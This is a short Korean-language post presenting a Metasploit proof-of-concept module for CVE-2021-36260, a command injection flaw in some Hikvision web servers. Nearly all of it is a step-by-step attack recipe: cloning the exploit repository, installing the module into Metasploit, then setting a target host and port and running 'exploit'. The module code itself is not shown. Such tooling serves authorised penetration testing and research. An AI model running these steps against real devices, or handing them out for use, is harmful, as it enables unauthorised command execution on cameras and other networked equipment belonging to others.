
CVE-2021-36260 관련 metasploit 스크립트(POC)
CVE-2021-36260에 대한 metasploit 스크립트(POC)입니다. 일부 Hikvision 제품의 웹 서버에 있는 명령 주입 취약점으로, 공격자는 악성 명령이 포함된 메시지를 전송하여 명령 주입 공격을 실행할 수 있습니다.
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
